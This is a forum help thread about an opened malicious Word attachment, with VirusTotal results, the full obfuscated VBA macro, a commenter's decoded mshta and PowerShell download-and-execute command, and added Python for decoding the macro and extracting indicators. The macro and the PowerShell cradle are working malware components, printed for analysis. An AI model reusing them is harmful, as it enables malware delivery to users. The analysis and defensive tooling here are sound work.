Opened malicious word attachment
January 15, 2018 12:16 PM
MS Word 365. We got an email with a word document that asked to "enable content" to actually see the contents. We did not actually click the "enable contents" button in the yellow bar, but did click the "enable editing" button.
Googlefu says not to click. The contents are obfuscated.
Norton is running and did not complain. How freaked out should we be?
Virus total found 10/60 positives
HEUR.VBA.Trojan.e
VBA.Trojan-Downloader.Agent.cko
PP97M/Agent.gen
VBA/TrojanDownloader.Agent.GFR
PP97M/Agent.gen
VBA/Agent.E650!tr
Trojan-Downloader.VBA.Agent
HEUR:Trojan-Downloader.Script.Generic
Probably W97Obfuscated
OLE Compound File Info
May try to run other files, shell commands or applications.
--Seems to contain deobfuscation code.
--Makes use of macros
--Macros And VBA Code Streams
ThisDocument.cls:
Private Function undertake(uncourting)
tufting = Array("c", "o", "i", "p", "y", "M", "W", "1", "u", "h", "E", "g", "V", "D", "l", "f", "5", "m", "7", "H", "r", "J", "4", "9", "G", "8", "t", "d")
antilithic = Array(".", "c", "j", "/", "f", "=", "n", "p", "h", ":", "m", "q", "o", "a", "i", "w", "?", "G", "P", "d", " ", "s", "x", "e", "k", "R", "u", "t")
berghaan = vbNullString
For Each ridder In uncourting
flameflower = boarwood(ridder, tufting)
If flameflower > -1 Then
berghaan = antilithic(flameflower) + berghaan
End If
Next
undertake = StrReverse(berghaan)
End Function
Public Function boarwood(annuals, reverberates)
fizzle = 5521
proctor = 7919
For fizzle = 0 To UBound(reverberates)
If reverberates(fizzle) = annuals And fizzle > -1 Then
proctor = fizzle
End If
Next
If proctor = 7919 Then
proctor = -1
End If
boarwood = proctor
End Function
Sub AutoClose()
uncourting = Array("E", "J", "u", "d", "D", "c", "9", "4", "9", "r", "u", "d", "d", "1", "h", "p", "p", "l", "i", "H", "g", "W", "f", "H", "g", "t", "f", "H", "V", "D", "J", "l", "H", "i", "c", "o", "V", "E", "p", "8", "7", "m", "p", "J", "V", "y", "c", "1", "u", "1", "5", "t", "d", "E", "D", "M", "V", "1", "J", "G")
pidginize = undertake(uncourting)
Application.Run "hoodlum", (pidginize)
End Sub
Private Sub hoodlum(exchangers)
medicant = 16202
ectepicondylar = True
While ectepicondylar
peripatecically = medicant + 717
If peripatecically - medicant > 1 Then
stricken = precompact + "ll"
Call VBA.Shell(exchangers, vbNormalFocus - 1)
ectepicondylar = False
End If
Wend
End Sub
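The macro above hides its command string behind a table substitution: each element of the payload array (uncourting) is looked up in a key table (tufting), the element at the same index of a value table (antilithic) is emitted, and anything not in the key table is dropped. The following Python is an added example, not code from the thread, that re-implements the macro's undertake()/boarwood() pair so an analyst can decode such a sample offline instead of letting Word run it. The sample tables and payload below are constructed and encode a harmless string; to analyse a real document, pass its own three Array(...) lines to decode_macro().

```python
"""Decoder for the table-substitution obfuscation in the macro above.

Added example, not code from the thread: a Python re-implementation of the
macro's undertake()/boarwood() pair. The sample tables below are
constructed and encode a harmless string; to analyse a real sample, pass
the macro's own three Array(...) lines to decode_macro() instead.
"""
import re


def last_index(ch, table):
    """Index of the last occurrence of ch in table, or -1.

    Mirrors boarwood(), which scans the whole table and keeps the final
    match rather than stopping at the first one."""
    found = -1
    for i, item in enumerate(table):
        if item == ch:
            found = i
    return found


def decode(payload, key_table, value_table):
    """Mirror of undertake(): substitute each payload element via the tables.

    The VBA prepends every decoded character and then calls StrReverse,
    which nets out to plain forward order, so appending is equivalent."""
    if len(key_table) != len(value_table):
        raise ValueError("key and value tables must have equal length")
    out = []
    for ch in payload:
        i = last_index(ch, key_table)
        if i > -1:          # elements missing from the key table are dropped
            out.append(value_table[i])
    return "".join(out)


def parse_vba_array(line):
    """Pull the string literals out of a VBA line such as  x = Array("a", "b")."""
    m = re.search(r'Array\((.*)\)', line)
    if not m:
        raise ValueError("no Array(...) literal on this line")
    return re.findall(r'"([^"]*)"', m.group(1))


def decode_macro(key_line, value_line, payload_line):
    """Decode straight from the three pasted VBA lines."""
    return decode(parse_vba_array(payload_line),
                  parse_vba_array(key_line),
                  parse_vba_array(value_line))


# Constructed sample (NOT the thread's tables): encodes "echo hello".
# The "z" element is absent from the key table and is silently dropped,
# exactly as the macro drops unknown characters.
KEY_LINE = 'tufting = Array("a", "b", "c", "d", "e", "f")'
VALUE_LINE = 'antilithic = Array("e", "c", "h", "o", " ", "l")'
PAYLOAD_LINE = ('uncourting = Array("a", "b", "c", "d", "z", "e", '
                '"c", "a", "f", "f", "d")')

if __name__ == "__main__":
    print(decode_macro(KEY_LINE, VALUE_LINE, PAYLOAD_LINE))
```

Running it on the constructed lines prints "echo hello". The same three-line call applied to a real macro's tufting, antilithic and uncourting lines yields the command that AutoClose() hands to VBA.Shell, which is the indicator you want to take to your mail filter and endpoint logs.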
I would make that backup on fresh media so you don't overwrite the previous backup.
posted by amtho at 1:18 PM on January 15, 2018
Well... it runs the command "mshta.exe http://*notshown*.com/RPG/sof.php?utma=opsk" (in the background) which leads to a webpage that tries to construct and run an ActiveX script.
The activeX script does this: powershell -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile('http://*notshown*.com/RPG/opsk.pfx', $env:APPDATA + '\\fbe24138.exe'); Start-Process $env:APPDATA'\\fbe24138.exe'; (New-Object System.Net.WebClient).DownloadString('http://*notshown*.com/s.php?id=opsk');
So if it was successful there's a file (or more files if it replicated) in your APPDATA folder that you need to delete (you'd probably also see that fbe24138.exe file running in task manager or other similar named files)
Don't know if this really helps. Didn't want to paste the full *notshown* URL but if you're really curious I can give it to you, though I don't recommend going there...
posted by one4themoment at 1:20 PM on January 15, 2018 [3 favorites]
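The command line one4themoment quotes is the kind of string that ends up in a process-creation log, and the useful response is to pull its indicators out rather than read it by eye. The following Python is an added example, not code from the thread: it lists the remote URLs, the local .exe drop names and the suspicious switches in such a command line. SAMPLE_CMDLINE is reconstructed from the comment above, with the domain left as the commenter's *notshown* placeholder.

```python
"""Indicator extraction for a PowerShell download-and-run command line.

Added example, not code from the thread. SAMPLE_CMDLINE is reconstructed
from one4themoment's comment, with the domain kept as the *notshown*
placeholder the commenter used.
"""
import re

SAMPLE_CMDLINE = (
    "powershell -Exec Bypass -NoExit -Command "
    "(New-Object System.Net.WebClient).DownloadFile("
    "'http://*notshown*.com/RPG/opsk.pfx', $env:APPDATA + '\\\\fbe24138.exe'); "
    "Start-Process $env:APPDATA'\\\\fbe24138.exe'; "
    "(New-Object System.Net.WebClient).DownloadString("
    "'http://*notshown*.com/s.php?id=opsk');"
)


def dedupe(items):
    """Drop repeats while keeping first-seen order."""
    seen, out = set(), []
    for x in items:
        if x not in seen:
            seen.add(x)
            out.append(x)
    return out


def extract_iocs(cmdline):
    """Return URLs, dropped executable names and behavioural signals."""
    urls = dedupe(re.findall(r"https?://[^\s'\"()]+", cmdline))
    files = dedupe(re.findall(r"[\w-]+\.exe\b", cmdline))
    low = cmdline.lower()
    signals = []
    # -ExecutionPolicy accepts prefixes, so "-Exec Bypass" also disables the policy
    if re.search(r"-ex\w*\s+bypass", low):
        signals.append("execution policy bypass")
    if "webclient" in low and ("downloadfile(" in low or "downloadstring(" in low):
        signals.append("WebClient download cradle")
    if "start-process" in low:
        signals.append("Start-Process launches a local file")
    if "-noexit" in low:
        signals.append("keeps the PowerShell process alive (-NoExit)")
    return {"urls": urls, "dropped_files": files, "signals": signals}


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

On the sample this reports two URLs, the single drop name fbe24138.exe under %APPDATA%, and all four signals. The drop name is what to look for in %APPDATA% and in Task Manager, as the comment says; the URLs are what to hand to whoever runs the mail gateway or proxy.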
Response by poster: Awesome. Thanks so much, one4themoment.
posted by nostrada at 2:38 PM on January 15, 2018
posted by pravit at 1:07 PM on January 15, 2018 [1 favorite]